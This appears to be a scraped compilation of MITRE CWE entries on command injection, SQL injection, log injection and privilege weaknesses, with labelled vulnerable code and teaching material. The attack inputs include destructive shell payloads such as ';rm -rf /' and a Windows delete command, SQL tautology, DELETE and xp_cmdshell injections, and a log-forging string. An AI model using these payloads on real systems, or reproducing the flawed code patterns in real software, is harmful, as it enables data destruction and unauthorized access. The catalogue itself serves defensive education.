$command = 'ls -l /home/' . $userName; system($command); The $userName variable is not checked for malicious input. An attacker could set the $userName variable to an arbitrary OS command such as: (attack code)
;rm -rf /
Which would result in $command being: (result)
ls -l /home/;rm -rf /
Since the semi-colon is a command separator in Unix, the OS would first execute the ls command, then the rm command, deleting the entire file system. Also note that this example code is vulnerable to Path Traversal (CWE-22) and Untrusted Search Path (CWE-426) attacks. Example 2 The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system. (bad code)
Example Language: C
int main(int argc, char** argv) {
char cmd[CMD_MAX] = "/usr/bin/cat "; }strcat(cmd, argv[1]); system(cmd); Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form ";rm -rf /", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition. Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120). Example 3 This example is a web application that intends to perform a DNS lookup of a user-supplied domain name. It is subject to the first variant of OS command injection. (bad code)
Example Language: Perl
use CGI qw(:standard);
$name = param('name'); $nslookup = "/path/to/nslookup"; print header; if (open($fh, "$nslookup $name|")) { while (<$fh>) { }print escapeHTML($_); }print "<br>\n"; close($fh); Suppose an attacker provides a domain name like this: (attack code)
cwe.mitre.org%20%3B%20/bin/ls%20-l
The "%3B" sequence decodes to the ";" character, and the %20 decodes to a space. The open() statement would then process a string like this: (result)
/path/to/nslookup cwe.mitre.org ; /bin/ls -l
As a result, the attacker executes the "/bin/ls -l" command and gets a list of all the files in the program's working directory. The input could be replaced with much more dangerous commands, such as installing a malicious program on the server. Example 4 The example below reads the name of a shell script to execute from the system properties. It is subject to the second variant of OS command injection. (bad code)
Example Language: Java
String script = System.getProperty("SCRIPTNAME");
if (script != null) System.exec(script);
If an attacker has control over this property, then they could modify the property to point to a dangerous program. Example 5 In the example below, a method is used to transform geographic coordinates from latitude and longitude format to UTM format. The method gets the input coordinates from a user through a HTTP request and executes a program local to the application server that performs the transformation. The method passes the latitude and longitude coordinates as a command-line option to the external program and will perform some processing to retrieve the results of the transformation and return the resulting UTM coordinates. (bad code)
Example Language: Java
public String coordinateTransformLatLonToUTM(String coordinates)
{ String utmCoords = null;
try { String latlonCoords = coordinates;
Runtime rt = Runtime.getRuntime(); Process exec = rt.exec("cmd.exe /C latlon2utm.exe -" + latlonCoords); // process results of coordinate transform // ... catch(Exception e) {...} return utmCoords; However, the method does not verify that the contents of the coordinates input parameter includes only correctly-formatted latitude and longitude coordinates. If the input coordinates were not validated prior to the call to this method, a malicious user could execute another program local to the application server by appending '&' followed by the command for another program to the end of the coordinate string. The '&' instructs the Windows operating system to execute another program. Example 6 The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user. (bad code)
Example Language: Java
...
String btype = request.getParameter("backuptype"); String cmd = new String("cmd.exe /K \" c:\\util\\rmanDB.bat "
+btype+ "&&c:\\utl\\cleanup.bat\"") System.Runtime.getRuntime().exec(cmd); ... The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form "& del c:\\dbms\\*.*", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well. Example 7 The following code is a wrapper around the UNIX command cat which prints the contents of a file to standard out. It is also injectable: (bad code)
Example Language: C
#include <stdio.h>
#include <unistd.h> int main(int argc, char **argv) { char cat[] = "cat "; char *command; size_t commandLength; commandLength = strlen(cat) + strlen(argv[1]) + 1; command = (char *) malloc(commandLength); strncpy(command, cat, commandLength); strncat(command, argv[1], (commandLength - strlen(cat)) ); system(command); return (0); Used normally, the output is simply the contents of the file requested, such as Story.txt: (informative)
./catWrapper Story.txt
(result)
When last we left our heroes...
However, if the provided argument includes a semicolon and another command, such as: (attack code)
Story.txt; ls
Then the "ls" command is executed by catWrapper with no complaint: (result)
./catWrapper Story.txt; ls
Two commands would then be executed: catWrapper, then ls. The result might look like: (result)
When last we left our heroes...
Story.txt SensitiveFile.txt PrivateData.db a.out* If catWrapper had been set to have a higher privilege level than the standard user, arbitrary commands could be executed with that higher privilege. Example 8 This example takes user input, passes it through an encoding scheme, then lists the contents of the user's home directory based on the user name. (bad code)
Example Language: Perl
sub GetUntrustedInput {
return($ARGV[0]); }sub encode { my($str) = @_; }$str =~ s/\&/\&/gs; $str =~ s/\"/\"/gs; $str =~ s/\'/\'/gs; $str =~ s/\</\</gs; $str =~ s/\>/\>/gs; return($str); sub doit { my $uname = encode(GetUntrustedInput("username")); }print "<b>Welcome, $uname!</b><p>\n"; system("cd /home/$uname; /bin/ls -l"); The programmer attempts to encode dangerous characters, however the denylist for encoding is incomplete (CWE-184) and an attacker can still pass a semicolon, resulting in a chain with OS command injection (CWE-78). Additionally, the encoding routine is used inappropriately with command execution. An attacker doesn't even need to insert their own semicolon. The attacker can instead leverage the encoding routine to provide the semicolon to separate the commands. If an attacker supplies a string of the form: (attack code)
' pwd
then the program will encode the apostrophe and insert the semicolon, which functions as a command separator when passed to the system function. This allows the attacker to complete the command injection. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Terminology
The "OS command injection" phrase carries different meanings to different people. For some people, it only refers to cases in which the attacker injects command separators into arguments for an application-controlled program that is being invoked. For some people, it refers to any type of attack that can allow the attacker to execute OS commands of their own choosing. This usage could include untrusted search path weaknesses (CWE-426) that cause the application to find and execute an attacker-controlled program. Further complicating the issue is the case when argument injection (CWE-88) allows alternate command-line switches or options to be inserted into the command line, such as an "-exec" switch whose purpose may be to execute the subsequent argument as a command (this -exec switch exists in the UNIX "find" command, for example). In this latter case, however, CWE-88 could be regarded as the primary weakness in a chain with CWE-78.
Research Gap
More investigation is needed into the distinction between the OS command injection variants, including the role with argument injection (CWE-88). Equivalent distinctions may exist in other injection-related problems such as SQL injection.
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "Weaknesses in OWASP Top Ten (2013)" (View-928)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In 2008, a large number of web servers were compromised using the same SQL injection attack string. This single string worked against many different programs. The SQL injection was then used to modify the web sites to serve malicious code. Example 2 The following code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user. (bad code)
Example Language: C#
...
string userName = ctx.getAuthenticatedUserName(); string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'"; sda = new SqlDataAdapter(query, conn); DataTable dt = new DataTable(); sda.Fill(dt); ... The query that this code intends to execute follows: (informative)
SELECT * FROM items WHERE owner = <userName> AND itemname = <itemName>;
However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string: (attack code)
name' OR 'a'='a
for itemName, then the query becomes the following: (attack code)
SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name' OR 'a'='a';
The addition of the: (attack code)
OR 'a'='a
condition causes the WHERE clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query: (attack code)
SELECT * FROM items;
This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner. Example 3 This example examines the effects of a different malicious value passed to the query constructed and executed in the previous example. If an attacker with the user name wiley enters the string: (attack code)
name'; DELETE FROM items; --
for itemName, then the query becomes the following two queries: (attack code)
Example Language: SQL
SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name';
DELETE FROM items; --' Many database servers, including Microsoft(R) SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error on Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, on databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database. Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. On a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in the previous example. If an attacker enters the string (attack code)
name'; DELETE FROM items; SELECT * FROM items WHERE 'a'='a
Then the following three valid statements will be created: (attack code)
SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name';
DELETE FROM items; SELECT * FROM items WHERE 'a'='a'; One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from an allowlist of safe values or identify and escape a denylist of potentially malicious values. Allowlists can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, denylisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can:
Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks. Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they do not protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example. (bad code)
Example Language: SQL
procedure get_item ( itm_cv IN OUT ItmCurTyp, usr in varchar2, itm in varchar2)
is open itm_cv for ' SELECT * FROM items WHERE ' || 'owner = '|| usr || ' AND itemname = ' || itm || '; end get_item; Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks. Example 4 MS SQL has a built in function that enables shell command execution. An SQL injection in such a context could be disastrous. For example, a query of the form: (bad code)
Example Language: SQL
SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='$user_input' ORDER BY PRICE
Where $user_input is taken from an untrusted source. If the user provides the string: (attack code)
'; exec master..xp_cmdshell 'dir' --
The query will take the following form: (attack code)
SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=''; exec master..xp_cmdshell 'dir' --' ORDER BY PRICE
Now, this query can be broken down into:
As can be seen, the malicious input changes the semantics of the query into a query, a shell command execution and a comment. Example 5 This code intends to print a message summary given the message ID. (bad code)
Example Language: PHP
$id = $_COOKIE["mid"];
mysql_query("SELECT MessageID, Subject FROM messages WHERE MessageID = '$id'"); The programmer may have skipped any input validation on $id under the assumption that attackers cannot modify the cookie. However, this is easy to do with custom client code or even in the web browser. While $id is wrapped in single quotes in the call to mysql_query(), an attacker could simply change the incoming mid cookie to: (attack code)
1432' or '1' = '1
This would produce the resulting query: (result)
SELECT MessageID, Subject FROM messages WHERE MessageID = '1432' or '1' = '1'
Not only will this retrieve message number 1432, it will retrieve all other messages. In this case, the programmer could apply a simple modification to the code to eliminate the SQL injection: (good code)
Example Language: PHP
$id = intval($_COOKIE["mid"]);
mysql_query("SELECT MessageID, Subject FROM messages WHERE MessageID = '$id'"); However, if this code is intended to support multiple users with different message boxes, the code might also need an access control check (CWE-285) to ensure that the application user has the permission to see that message. Example 6 This example attempts to take a last name provided by a user and enter it into a database. (bad code)
Example Language: Perl
$userKey = getUserID();
$name = getUserInput(); # ensure only letters, hyphens and apostrophe are allowed $name = allowList($name, "^a-zA-z'-$"); $query = "INSERT INTO last_names VALUES('$userKey', '$name')"; While the programmer applies an allowlist to the user input, it has shortcomings. First of all, the user is still allowed to provide hyphens, which are used as comment structures in SQL. If a user specifies "--" then the remainder of the statement will be treated as a comment, which may bypass security logic. Furthermore, the allowlist permits the apostrophe, which is also a data / command separator in SQL. If a user supplies a name with an apostrophe, they may be able to alter the structure of the whole statement and even change control flow of the program, possibly accessing or modifying confidential information. In this situation, both the hyphen and apostrophe are legitimate characters for a last name and permitting them is required. Instead, a programmer may want to use a prepared statement or apply an encoding routine to the input to prevent any data / directive misinterpretations. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
SQL injection can be resultant from special character mismanagement, MAID, or denylist/allowlist problems. It can be primary to authentication errors.
CWE-117: Improper Output Neutralization for Logs
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "Seven Pernicious Kingdoms" (View-700)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following web application code attempts to read an integer value from a request object. If the parseInt call fails, then the input is logged with an error message indicating what happened. (bad code)
Example Language: Java
String val = request.getParameter("val");
try { int value = Integer.parseInt(val); catch (NumberFormatException) { log.info("Failed to parse val = " + val); }... If a user submits the string "twenty-one" for val, the following entry is logged:
However, if an attacker submits the string "twenty-one%0a%0aINFO:+User+logged+out%3dbadguy", the following entry is logged:
Clearly, attackers can use this same mechanism to insert arbitrary log entries. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-282: Improper Ownership Management
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product assigns the wrong ownership, or does not properly verify the ownership, of an object or resource.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This function is part of a privileged program that takes input from users with potentially lower privileges. (bad code)
Example Language: Python
def killProcess(processID):
os.kill(processID, signal.SIGKILL)
This code does not confirm that the process to be killed is owned by the requesting user, thus allowing an attacker to kill arbitrary processes. This function remedies the problem by checking the owner of the process before killing it: (good code)
Example Language: Python
def killProcess(processID):
user = getCurrentUser()
#Check process owner against requesting user if getProcessOwner(processID) == user: os.kill(processID, signal.SIGKILL)
return else: print("You cannot kill a process you don't own")
return Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance CWE-281: Improper Preservation of Permissions
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-269: Improper Privilege Management
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code temporarily raises the program's privileges to allow creation of a new user folder. (bad code)
Example Language: Python
def makeNewUserDir(username):
While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur. Example 2 The following example demonstrates the weakness. (bad code)
Example Language: C
seteuid(0);
/* do some stuff */ seteuid(getuid()); Example 3 The following example demonstrates the weakness. (bad code)
Example Language: Java
AccessController.doPrivileged(new PrivilegedAction() {
public Object run() {
// privileged code goes here, for example:
}System.loadLibrary("awt"); return null; // nothing to return Example 4 This code intends to allow only Administrators to print debug information about a system. (bad code)
Example Language: Java
public enum Roles {
ADMIN,USER,GUEST }public void printDebugInfo(User requestingUser){ if(isAuthenticated(requestingUser)){
switch(requestingUser.role){
case GUEST:
System.out.println("You are not authorized to perform this command");
break; default: System.out.println(currentDebugState());
break; else{ System.out.println("You must be logged in to perform this command"); }While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of "GUEST". Someone with the role of "ADMIN" or "USER" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system. Example 5 This code allows someone with the role of "ADMIN" or "OPERATOR" to reset a user's password. The role of "OPERATOR" is intended to have less privileges than an "ADMIN", but still be able to help users with small issues such as forgotten passwords. (bad code)
Example Language: Java
public enum Roles {
ADMIN,OPERATOR,USER,GUEST }public void resetPassword(User requestingUser, User user, String password ){ if(isAuthenticated(requestingUser)){
switch(requestingUser.role){
case GUEST:
System.out.println("You are not authorized to perform this command");
break; case USER: System.out.println("You are not authorized to perform this command");
break; default: setPassword(user,password); }break; else{ System.out.println("You must be logged in to perform this command"); }This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
CWE-424: Improper Protection of Alternate Path
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not sufficiently protect all possible paths that a user can take to access restricted functionality or resources.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-307: Improper Restriction of Excessive Authentication Attempts
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts [REF-236]. The attacker targeted a member of Twitter's support team and was able to successfully guess the member's password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts.
Example 2 The following code, extracted from a servlet's doPost() method, performs an authentication lookup every time the servlet is invoked. (bad code)
Example Language: Java
String username = request.getParameter("username");
String password = request.getParameter("password"); int authResult = authenticateUser(username, password); However, the software makes no attempt to restrict excessive authentication attempts. Example 3 This code attempts to limit the number of login attempts by causing the process to sleep before completing the authentication. (bad code)
Example Language: PHP
$username = $_POST['username'];
$password = $_POST['password']; sleep(2000); $isAuthenticated = authenticateUser($username, $password); However, there is no limit on parallel connections, so this does not increase the amount of time an attacker needs to complete an attack. Example 4 In the following C/C++ example the validateUser method opens a socket connection, reads a username and password from the socket and attempts to authenticate the username and password. (bad code)
Example Language: C
int validateUser(char *host, int port)
{ int socket = openSocketConnection(host, port);
if (socket < 0) { printf("Unable to open socket connection"); }return(FAIL); int isValidUser = 0; char username[USERNAME_SIZE]; char password[PASSWORD_SIZE]; while (isValidUser == 0) { if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {
if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) { }isValidUser = AuthenticateUser(username, password); }return(SUCCESS); The validateUser method will continuously check for a valid username and password without any restriction on the number of authentication attempts made. The method should limit the number of authentication attempts made to prevent brute force attacks as in the following example code. (good code)
Example Language: C
int validateUser(char *host, int port)
{ ...
int count = 0; while ((isValidUser == 0) && (count < MAX_ATTEMPTS)) { if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {
